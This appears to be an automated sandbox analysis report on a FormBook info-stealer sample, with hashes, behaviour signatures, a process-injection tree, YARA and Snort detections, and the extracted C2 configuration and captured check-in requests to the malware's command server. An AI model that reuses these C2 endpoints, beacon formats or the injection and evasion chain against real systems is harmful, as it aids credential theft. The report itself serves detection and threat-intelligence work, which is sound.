
Windows Analysis Report
primosdv3.1.1.0.exe

Overview

General Information

Sample Name: primosdv3.1.1.0.exe
Analysis ID: 715075
MD5: 633bb3ab12d6fd7b6956aa3a93f55e9c
SHA1: f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
SHA256: 0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Found hidden mapped module (file has been removed from disk)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
File is packed with WinRar
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • primosdv3.1.1.0.exe (PID: 5604 cmdline: C:\Users\user\Desktop\primosdv3.1.1.0.exe MD5: 633BB3AB12D6FD7B6956AA3A93F55E9C)
    • bstkiooen.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: A2AF309781DF2F75DC0B57AE63B0F3A9)
      • bstkiooen.exe (PID: 3092 cmdline: "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: A2AF309781DF2F75DC0B57AE63B0F3A9)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 4024 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 1244 cmdline: /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration (FormBook)

{"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}

Yara Matches (dropped files)

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\F61A.tmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
C:\Users\user\AppData\Local\Temp\F61A.tmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | (matched strings below)
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
C:\Users\user\AppData\Local\Temp\F61A.tmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (matched strings below)
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
C:\Users\user\AppData\Local\Temp\F61A.tmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | (matched strings below)
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Yara Matches (memory dumps)

Source | Rule | Description | Author | Strings
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | (matched strings below)
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (matched strings below)
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | (matched strings below)
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
(37 further memory-dump entries not shown)

Yara Matches (unpacked PEs)

Source | Rule | Description | Author | Strings
2.2.bstkiooen.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
2.2.bstkiooen.exe.400000.1.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | (matched strings below)
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.bstkiooen.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | (matched strings below)
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.bstkiooen.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | (matched strings below)
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
1.2.bstkiooen.exe.1010000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | -
(15 further unpacked-PE entries not shown)

Sigma Overview

No Sigma rule has matched

Snort IDS Alerts

Timestamp: 10/03/22-16:00:41.738205
Source IP: 192.168.2.3
Destination IP: 103.224.212.221
SID: 2031412
Source Port: 49708
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/03/22-16:00:41.738205
Source IP: 192.168.2.3
Destination IP: 103.224.212.221
SID: 2031449
Source Port: 49708
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 10/03/22-16:00:41.738205
Source IP: 192.168.2.3
Destination IP: 103.224.212.221
SID: 2031453
Source Port: 49708
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


            AV Detection

Source: Yara match | File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp | Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | ReversingLabs: Detection: 23%
Source: primosdv3.1.1.0.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Joe Sandbox ML: detected
Source: 1.2.bstkiooen.exe.1010000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.3a2f840.4.unpack | Avira: Label: TR/ATRAPS.Gen5
Source: 2.2.bstkiooen.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.60d900.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}
Source: primosdv3.1.1.0.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: primosdv3.1.1.0.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
            Source: Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Code function: 0_2_00C8B348 FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe | Code function: 4x nop then pop edi

            Networking

Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.221 80
Source: C:\Windows\explorer.exe | Network Connect: 5.101.152.161 80
Source: C:\Windows\explorer.exe | Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe | Domain query: www.sandstormcase.us
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Malware configuration extractor | URLs: www.nordenergogrup.store/sk29/
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: global traffic | HTTP traffic detected: GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1 | Host: www.nordenergogrup.store | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: global traffic | HTTP traffic detected: GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1 | Host: www.sandstormcase.us | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (empty)
Source: Joe Sandbox View | IP Address: 103.224.212.221
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx-reuseport/1.21.1 | Date: Mon, 03 Oct 2022 14:00:19 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 284 | Connection: close | Vary: Accept-Encoding | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>
Source: svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m
Source: explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown | DNS traffic detected: queries for: www.nordenergogrup.store
Source: bstkiooen.exe, 00000001.00000002.380669907.000000000109A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

Source: Yara match | File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

            System Summary

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
